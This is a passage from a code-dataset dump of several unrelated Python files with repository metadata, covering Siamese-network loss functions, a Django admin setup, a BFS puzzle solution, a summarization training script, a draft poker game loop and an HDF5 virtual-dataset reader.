"en", "doc_type": "code", "stars": 48, "dataset": "github-code", "pt": "53", "api": [{"api_name": 
"six.moves.urllib.request.pathname2url", "line_number": 31, "usage_type": "call"}, {"api_name": "six.moves.urllib.request", "line_number": 31, "usage_type": "attribute"}, {"api_name": "six.moves.urllib", "line_number": 31, "usage_type": "name"}, {"api_name": "gnomegmail.GMailAPI", "line_number": 42, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 15, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 20, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 21, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 23, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "38124905955", "text": "import torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nimport torch\nimport numpy as np\nimport random\nfrom torchvision.datasets import MNIST\nfrom efficientnet_pytorch import EfficientNet\nfrom torch.nn.modules.distance import PairwiseDistance\nclass EmbeddingNet(nn.Module):\n def __init__(self,\n backbone = \"our\",\n embedding_size=128):\n super(EmbeddingNet, self).__init__()\n\n if backbone==\"resnet18\":\n pretrained_net = models.resnet18(pretrained=True)\n self.inplanes = 64\n\n self.convnet = nn.Sequential()\n self.convnet.add_module('conv1',nn.Conv2d(1, self.inplanes, kernel_size=7, stride=2, padding=3,\n bias=False))\n for idx, layer in enumerate(pretrained_net.children()):\n # Change the first conv and last linear layer\n if isinstance(layer, nn.Linear) == False and idx!=0:\n self.convnet.add_module(str(idx),layer)\n\n self.use_fc = True\n self.fc = nn.Linear(512, embedding_size)\n\n elif backbone==\"efficientnet-b0\":\n self.use_fc = False\n self.convnet = EfficientNet.from_pretrained('efficientnet-b0',num_classes=128, in_channels=1)\n elif backbone==\"vgg11\":\n\n pretrained_net = models.vgg11().features\n self.inplanes = 64\n\n self.convnet = nn.Sequential()\n self.convnet.add_module('conv1', nn.Conv2d(1, self.inplanes, kernel_size=3, padding=1))\n for idx, layer in enumerate(pretrained_net.children()):\n # Change the first conv and last linear layer\n if idx != 0:\n self.convnet.add_module(str(idx), layer)\n self.convnet.add_module('averagepool',nn.AdaptiveAvgPool2d(1))\n self.use_fc = True\n self.fc = nn.Linear(512, embedding_size)\n\n elif backbone==\"alex\":\n self.use_fc = True\n\n self.convnet = nn.Sequential(\n # conv1\n nn.Conv2d(1, 96, 5, 1,padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(3, 2),\n # conv2\n nn.Conv2d(96, 256, 5, 1,padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(3, 2),\n # conv3\n nn.Conv2d(256, 384, 3, 1,padding=1),\n nn.ReLU(inplace=True),\n # conv4\n nn.Conv2d(384, 384, 3, 1,padding=1),\n nn.ReLU(inplace=True),\n # conv5\n nn.AdaptiveAvgPool2d(1))\n self.fc = nn.Linear(384, embedding_size)\n\n\n def forward(self, x):\n return self.get_embedding(x)\n\n def get_embedding(self, x):\n output = self.convnet(x)\n if self.use_fc:\n output = output.view(output.size()[0], -1)\n output = self.fc(output)\n output = F.normalize(output, p=2, dim=1)\n # multiply by alpha = 10 as suggested in 
https://arxiv.org/pdf/1703.09507.pdf\n alpha = 10\n output = output * alpha\n return output\n\nclass Classifinet(EmbeddingNet):\n def __init__(self,\n backbone=\"efficientnet-b0\",\n embedding_size=128):\n super(Classifinet, self).__init__(backbone,embedding_size)\n self.classifier = nn.Sequential(nn.Linear(embedding_size, 1))\n # self.initialize()\n\n def initialize(self):\n nn.init.xavier_uniform(self.classifier.weight.data)\n self.classifier.bias.data.zero_()\n\n def forward(self, x1, x2):\n embed_1 = self.get_embedding(x1)\n embed_2 = self.get_embedding(x2)\n\n embed = torch.abs(embed_1-embed_2)\n output = torch.sigmoid(self.classifier(embed))\n return output\n\n\nclass DTripletLoss(nn.Module):\n \"\"\"\n Triplet loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n\n def __init__(self, margin = 5.):\n super(DTripletLoss, self).__init__()\n self.margin = margin\n self.pair_loss = PairwiseDistance(2)\n\n\n def forward(self, anchor1, anchor2, negative1, negative2, size_average=True):\n distance_positive1 = self.pair_loss(anchor1, anchor2)\n distance_positive2 = self.pair_loss(negative1, negative2)\n distance_negative1 = self.pair_loss(anchor1, negative2)\n distance_negative2 = self.pair_loss(anchor2, negative1)\n losses = distance_positive1 + distance_positive2 + F.relu( - distance_negative1 - distance_negative2 + self.margin)\n return losses.mean()\n\nclass TripletLoss(nn.Module):\n \"\"\"\n Triplet loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n\n def __init__(self, margin = 1.):\n super(TripletLoss, self).__init__()\n self.margin = margin\n self.pair_loss = PairwiseDistance(2)\n self.alpha = 2\n\n\n def forward(self, embed_f, embed_l, size_average=True):\n batch_size = embed_f.shape[0]\n index = np.arange(batch_size)\n new_index = index.copy()-1\n distance_positive1 = self.pair_loss(embed_f[index], embed_l[index])\n distance_negative1 = self.pair_loss(embed_f[index], embed_l[new_index])\n distance_negative2 = self.pair_loss(embed_f[new_index], embed_l[index])\n\n losses = F.relu(2*distance_positive1 - distance_negative1 - distance_negative2 + self.margin)\n return losses.mean(), distance_positive1.mean(), (distance_negative2+distance_negative1).mean()/2\n\nclass ITripletLoss(nn.Module):\n \"\"\"\n Triplet loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n\n def __init__(self, margin = 1.):\n super(ITripletLoss, self).__init__()\n self.margin = margin\n self.pair_loss = PairwiseDistance(2)\n\n\n def forward(self, embed_f, embed_l, size_average=True):\n split_index = embed_f.shape[0]//2\n distance_positive1 = self.pair_loss(embed_f[:split_index], embed_l[:split_index])\n distance_positive2 = self.pair_loss(embed_f[split_index:], embed_l[split_index:])\n distance_negative1 = self.pair_loss(embed_f[:split_index], embed_f[split_index:])\n distance_negative2 = self.pair_loss(embed_l[:split_index], embed_l[split_index:])\n losses = F.relu(distance_positive1 + distance_positive2 - distance_negative1 - distance_negative2 + self.margin)\n return losses.mean()\n\nclass ContrastiveLoss(nn.Module):\n \"\"\"\n Contrastive loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n\n def __init__(self, margin = 1.):\n super(ContrastiveLoss, self).__init__()\n self.margin = margin\n self.pair_loss = PairwiseDistance(2)\n\n\n def forward(self, embed_f, embed_l, size_average=True):\n losses = self.pair_loss(embed_f, embed_l)\n return 
losses.mean()\n\nclass ClassificationLoss(nn.Module):\n \"\"\"\n Contrastive loss\n Takes embeddings of an anchor sample, a positive sample and a negative sample\n \"\"\"\n def __init__(self,embed_size=128):\n super(ClassificationLoss, self).__init__()\n self.classifier = nn.Sequential(nn.Linear(embed_size*2,1),\n nn.Sigmoid())\n\n self.cretio = nn.BCELoss()\n # self.initialize()\n\n\n\n def forward(self,embed_f, embed_l, target):\n pred = self.predict(embed_f,embed_l)\n print(pred)\n print(target)\n loss = self.cretio(pred,target)\n return loss\n\n def evaluate(self,embed_f, embed_l):\n batch_size = embed_f.shape[0]\n index = np.arange(batch_size)\n new_index = index.copy() - 1\n\n correct = 0\n correct += torch.sum(self.predict(embed_f[index],embed_l[index])>0.5).data.cpu().numpy()\n correct += torch.sum(self.predict(embed_f[index],embed_l[new_index])<0.5).data.cpu().numpy()\n return batch_size*2,correct\n\n def predict(self,embed_1, embed_2):\n input_vect = torch.cat([embed_1,embed_2],dim=1)\n return self.classifier(input_vect)\n\n\n\n\n\n\n\n", "repo_name": "UCSD-AI4H/XRayGAN", "sub_path": "models/Siamese.py", "file_name": "Siamese.py", "file_ext": "py", "file_size_in_byte": 8067, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torchvision.models.resnet18", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "efficientnet_pytorch.EfficientNet.from_pretrained", "line_number": 33, "usage_type": "call"}, {"api_name": "efficientnet_pytorch.EfficientNet", "line_number": 33, "usage_type": "name"}, {"api_name": "torchvision.models.vgg11", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, 
"usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 95, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "name"}, {"api_name": "torch.abs", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.modules.distance.PairwiseDistance", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 127, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.nn.modules.distance.PairwiseDistance", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 151, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.nn.modules.distance.PairwiseDistance", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 169, "usage_type": "name"}, {"api_name": "torch.nn.Module", 
"line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 172, "usage_type": "name"}, {"api_name": "torch.nn.modules.distance.PairwiseDistance", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 188, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 188, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn.Sigmoid", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 198, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 198, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "35414991835", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib import admin\n\n# Register your models here.\nfrom account.admin import admin_site\nfrom statistics.models import Statistics, TStatistics\n\n\nclass StatisticsAdmin(admin.ModelAdmin):\n list_display = [\"date\", \"channel\", \"version\", \"ad_source\", \"ad_type\", \"show_count\", \"click_count\", \"download_count\",\n \"success_download_count\", \"install_count\", \"success_install_count\", \"launch_count\", \"gold_count\"]\n\n def get_actions(self, request):\n actions = super(StatisticsAdmin, self).get_actions(request)\n if request.user.username[0].upper() != 'J':\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n\nclass TStatisticsAdmin(admin.ModelAdmin):\n list_display = [\"date\", \"ad_source\", \"ad_position\", \"request_time\", \"request_count\", \"return_count\", \"show_count\",\n \"fill_percent\", \"show_percent\"]\n\n def get_actions(self, request):\n actions = super(TStatisticsAdmin, self).get_actions(request)\n if request.user.username[0].upper() != 'J':\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n\nadmin_site.register(Statistics, StatisticsAdmin)\nadmin_site.register(TStatistics, TStatisticsAdmin)\n", "repo_name": "echoturing/make_money", "sub_path": "statistics/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 1363, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 11, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 23, "usage_type": "name"}, {"api_name": "account.admin.admin_site.register", "line_number": 35, "usage_type": "call"}, {"api_name": "statistics.models.Statistics", "line_number": 35, "usage_type": "argument"}, {"api_name": "account.admin.admin_site", "line_number": 35, "usage_type": "name"}, {"api_name": "account.admin.admin_site.register", "line_number": 36, "usage_type": "call"}, {"api_name": "statistics.models.TStatistics", "line_number": 36, "usage_type": "argument"}, 
{"api_name": "account.admin.admin_site", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "35587837896", "text": "import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nm,n,k = map(int,input().split())\ngraph = [[0]*n for _ in range(m)]\ndx = [1, 0, -1, 0]\ndy = [0, 1, 0, -1]\narea = [] # 넓이\n\n# 도형 채우기\nfor _ in range(k):\n x1,y1,x2,y2 = map(int,input().split())\n for i in range(y1,y2): # y2-y1, 세로길이들\n for j in range(x1,x2): # x2-x1, 가로길이들\n graph[i][j] = 1 # 그래프에 채우기\n \ndef BFS(x,y):\n cnt = 1\n graph[x][y] = 1\n q = deque([(x,y)])\n while q:\n x,y = q.popleft() \n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if nx>=0 and nx=0 and ny 0:\n use_coverage = True\n for b in range(batch_n):\n # initialization\n batch_x = article[b*batch_size: (b+1)*batch_size]\n batch_y = title[b*batch_size: (b+1)*batch_size]\n #batch_x_ext = article_extend[b*batch_size: (b+1)*batch_size]\n batch_x, batch_x_ext, batch_y, extend_vocab, extend_lengths = \\\n utils.batch_index(batch_x, batch_y, word2idx, target2idx)\n\n if args.use_cuda:\n batch_x = batch_x.cuda()\n batch_y = batch_y.cuda()\n batch_x_ext = batch_x_ext.cuda()\n x_lengths = source_lengths[b*batch_size: (b+1)*batch_size]\n y_lengths = target_lengths[b*batch_size: (b+1)*batch_size]\n\n # work around to deal with length\n pack = pack_padded_sequence(batch_x_ext, x_lengths, batch_first=True)\n batch_x_ext_var, _ = pad_packed_sequence(pack, batch_first=True)\n current_loss = train_on_batch(encoder, decoder, optimizer,\n batch_x, batch_y, x_lengths, y_lengths,\n word2idx, target2idx, batch_x_ext_var,\n extend_lengths, use_coverage)\n\n batch_x = batch_x.cpu()\n batch_y = batch_y.cpu()\n batch_x_ext = batch_x_ext.cpu()\n\n print('epoch:{}/{}, batch:{}/{}, loss:{}'.format(epoch+1, n_epoch, b+1, batch_n, current_loss))\n if (b+1) % args.show_decode == 0:\n torch.save(encoder.state_dict(), 'encoder_model')\n torch.save(decoder.state_dict(), 'decoder_model')\n batch_x_val, batch_x_ext_val, batch_y_val, extend_vocab, extend_lengths = \\\n utils.batch_index(val_article, val_title, word2idx, target2idx)\n for i in range(1):\n idx = np.random.randint(0,val_size)\n decode.beam_search(encoder, decoder, batch_x_val[idx].unsqueeze(0),\n batch_y_val[idx].unsqueeze(0), word2idx, target2idx,\n batch_x_ext_val[idx], extend_lengths[idx],\n extend_vocab[idx])\n\n batch_x_val = batch_x_val.cpu()\n batch_y_val = batch_y_val.cpu()\n batch_x_ext_val = batch_x_ext_val.cpu()\n\n total_loss += current_loss\n print('-'*30)\n\n print()\n print(\"training finished\")\n\n\ndef reverse_mapping(word2idx):\n\n idx2word = {v:k for (k,v) in word2idx.items()}\n\n return idx2word\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--use_cuda\",action=\"store_true\")\n parser.add_argument(\"-beam_size\",action=\"store\", type=int)\n parser.add_argument(\"-show_decode\",action=\"store\", type=int)\n parser.add_argument(\"-batch\",action=\"store\", type=int)\n parser.add_argument(\"-train_size\", action=\"store\", type=int)\n parser.add_argument(\"--CNN\",action=\"store_true\")\n parser.add_argument(\"--giga\",action=\"store_true\")\n args = parser.parse_args()\n\n if os.path.exists('./temp/x.pkl'):\n article, title, s_lengths, t_lengths,\\\n val_article, val_title, val_source_lengths,\\\n val_target_lengths,word2idx = utils.load_everything()\n target2idx = word2idx\n else:\n article, title, s_lengths, t_lengths, word2idx, target2idx = prepare_training(args)\n\n train(article, title, word2idx, target2idx, s_lengths, 
t_lengths, args,\n val_article, val_title, val_source_lengths, val_target_lengths)\n\n\n", "repo_name": "b02902026/Summarization_project", "sub_path": "summary.py", "file_name": "summary.py", "file_ext": "py", "file_size_in_byte": 6691, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.autograd.Variable", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 19, "usage_type": "call"}, {"api_name": "prepare_data.sort_by_length", "line_number": 31, "usage_type": "call"}, {"api_name": "prepare_data.padding", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "prepare_data.sampling", "line_number": 45, "usage_type": "call"}, {"api_name": "prepare_data.save_everything", "line_number": 47, "usage_type": "call"}, {"api_name": "seq2seq.Encoder", "line_number": 66, "usage_type": "call"}, {"api_name": "seq2seq.Decoder", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 72, "usage_type": "attribute"}, {"api_name": "prepare_data.batch_index", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pack_padded_sequence", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_packed_sequence", "line_number": 109, "usage_type": "call"}, {"api_name": "training.train_on_batch", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 122, "usage_type": "call"}, {"api_name": "prepare_data.batch_index", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 126, "usage_type": "attribute"}, {"api_name": "decode.beam_search", "line_number": 127, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "prepare_data.load_everything", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "16176343180", "text": "# Poker\nfrom texasholdem import Player, NotEnoughPlayerError, PlayerLimitExceededError, NotEnoughPlayerBankrollError, \\\n OutOfBuyInRangeError, OccupiedSeatError, Deck\nfrom texasholdem.table import Table\n\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\ntable = Table(name=\"mytable\")\n\nlogger.debug(\n \"Creater new table. (id={})\".format(\n table.id\n )\n)\n\ntable.max_player = 2\ntable.stakes\n{\n \"BB\": 2,\n \"SB\": 1,\n \"ante\": 0,\n}\n\nlogger.debug(\n \"Table Information. 
{}\".format(\n table\n )\n)\n\nplayer_sasaki = Player(\n name=\"Sasaki\",\n bankroll=10000\n)\n\nplayer_lapi = Player(\n name=\"Lapi\",\n bankroll=10000\n)\n\ntry:\n table.add_players([player_sasaki, player_lapi])\nexcept PlayerLimitExceededError as e:\n # 人数制限を超えた場合\n raise e\n\ntry:\n table.seat_player(\n player=player_sasaki,\n seat_number=seat_number,\n )\nexcept OccupiedSeatError as e:\n # 席が空いていない場合\n raise e\nfinally:\n pass\n# 最終処理\n\n\ntry:\n table.buy_in(\n player=player_sasaki,\n amount=200,\n )\nexcept NotEnoughPlayerBankrollError as e:\n # Bankroll不足\n raise e\nexcept OutOfBuyInRangeError as e:\n # Buy-in範囲\n raise e\nfinally:\n # 最終処理\n pass\n# ゲームの開始準備\n# BB決めたり\n\n\ntry:\n table.initialize()\nexcept NotEnoughPlayerError as e:\n # 人数不足の場合\n raise e\nwhile table.isActive():\n # ハンドを進める\n play_hand(hand)\n # Playerの増減処理\n # バイイン\n # 次のハンドへ(BBの移動など)\n table.next_hand()\n\n\n# ゲーム終了処理\n\n\ndef play_hand(table):\n # Initialise\n cards = Deck()\n cards.shuffle() # 乱数シードを記録\n\n order_of_players = [p for p in table.order_of_players if isinstance(p, Player)]\n\n # プレイヤーに十分なスタックがあるか確認\n # Pre-Flop\n # Flop\n # Turn\n # River\n", "repo_name": "dragoneena12/holdem-server", "sub_path": "texasholdem/flow.py", "file_name": "flow.py", "file_ext": "py", "file_size_in_byte": 1972, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "texasholdem.table.Table", "line_number": 11, "usage_type": "call"}, {"api_name": "texasholdem.Player", "line_number": 33, "usage_type": "call"}, {"api_name": "texasholdem.Player", "line_number": 38, "usage_type": "call"}, {"api_name": "texasholdem.PlayerLimitExceededError", "line_number": 45, "usage_type": "name"}, {"api_name": "texasholdem.OccupiedSeatError", "line_number": 54, "usage_type": "name"}, {"api_name": "texasholdem.NotEnoughPlayerBankrollError", "line_number": 67, "usage_type": "name"}, {"api_name": "texasholdem.OutOfBuyInRangeError", "line_number": 70, "usage_type": "name"}, {"api_name": "texasholdem.NotEnoughPlayerError", "line_number": 82, "usage_type": "name"}, {"api_name": "texasholdem.Deck", "line_number": 99, "usage_type": "call"}, {"api_name": "texasholdem.Player", "line_number": 102, "usage_type": "argument"}]} +{"seq_id": "20442279681", "text": "import abc\nimport os\nimport tempfile\nfrom pathlib import Path\n\nimport h5py\n\nfrom ams.store import AMSDataStore\n\n\nclass AMSHDF5VirtualDBReader:\n class DataDescr:\n def __init__(self, input_shape, i_type, output_shape, o_type):\n self._i_shape = input_shape\n self._o_shape = output_shape\n self._i_type = i_type\n self._o_type = o_type\n\n @property\n def i_shape(self):\n return self._i_shape\n\n @property\n def o_shape(self):\n return self._o_shape\n\n @property\n def i_type(self):\n return self._i_type\n\n @property\n def o_type(self):\n return self._o_type\n\n @staticmethod\n def verify_dsets(dsets_descr):\n i_types = set()\n o_types = set()\n i_shape = set()\n o_shape = set()\n for k, v in dsets_descr.items():\n i_types.add(v.i_type)\n o_types.add(v.o_type)\n i_shape.add(v.i_shape[-1])\n o_shape.add(v.o_shape[-1])\n if len(i_types) != 1:\n raise RuntimeError(f\"File {k} has un-expected data-type\")\n\n if len(o_types) != 1:\n raise RuntimeError(f\"File {k} has un-expected data-type\")\n\n 
if len(i_shape) != 1:\n raise RuntimeError(f\"File {k} has un-expected input shape\")\n\n if len(o_shape) != 1:\n raise RuntimeError(f\"File {k} has un-expected output shape\")\n\n return\n\n @staticmethod\n def create_vds_layout(dsets_descr):\n fn = next(iter(dsets_descr))\n i_shape = list(dsets_descr[fn].i_shape)\n o_shape = list(dsets_descr[fn].o_shape)\n i_type = dsets_descr[fn].i_type\n o_type = dsets_descr[fn].o_type\n\n i_shape[0] = sum(v.i_shape[0] for k, v in dsets_descr.items())\n o_shape[0] = sum(v.o_shape[0] for k, v in dsets_descr.items())\n\n assert i_shape[0] == o_shape[0], \"Outer dimension of input/output shape does not match\"\n\n print(fn, i_type, i_shape)\n print(fn, o_type, o_shape)\n\n i_layout = h5py.VirtualLayout(shape=tuple(i_shape), dtype=i_type)\n o_layout = h5py.VirtualLayout(shape=tuple(o_shape), dtype=o_type)\n\n outer_index = 0\n for k, v in dsets_descr.items():\n i_source = h5py.VirtualSource(k, \"inputs\", shape=v.i_shape)\n i_layout[outer_index : outer_index + v.i_shape[0], ...] = i_source\n o_source = h5py.VirtualSource(k, \"outputs\", shape=v.o_shape)\n o_layout[outer_index : outer_index + v.o_shape[0], ...] = o_source\n outer_index += v.i_shape[0]\n\n return i_layout, o_layout\n\n def __init__(self, files, i_names=list(), o_names=list()):\n dsets_descr = dict()\n\n if not files:\n return\n\n for f in files:\n print(f\"Processing file: {f}\")\n # Every file has both input, output data\n # Open file and pick the data types and the shapes.\n # We need those to map them correctly to a virtual file.\n with h5py.File(f, \"r\") as fd:\n i_shape = fd[\"inputs\"].shape\n i_type = fd[\"inputs\"].dtype\n o_shape = fd[\"outputs\"].shape\n o_type = fd[\"outputs\"].dtype\n\n if not i_names:\n i_names = [f\"input_{i}\" for i in range(i_shape[-1])]\n else:\n if len(i_names) != i_shape[-1]:\n raise RuntimeError(f\"Input name description {i_names} differs in size with {i_shape[-1]}\")\n\n if not o_names:\n o_names = [f\"output_{i}\" for i in range(o_shape[-1])]\n else:\n if len(o_names) != o_shape[-1]:\n raise RuntimeError(f\"Ouput name description {o_names} differs in size with {o_shape[-1]}\")\n\n dsets_descr[f] = AMSHDF5VirtualDBReader.DataDescr(i_shape, i_type, o_shape, o_type)\n\n self.verify_dsets(dsets_descr)\n i_vds, o_vds = self.create_vds_layout(dsets_descr)\n self._fn = Path(tempfile.mkdtemp()) / Path(\"VDS.h5\")\n print(f\"VDS name is {self._fn}\")\n\n with h5py.File(self._fn, \"w\") as fd:\n fd.create_virtual_dataset(\"inputs\", 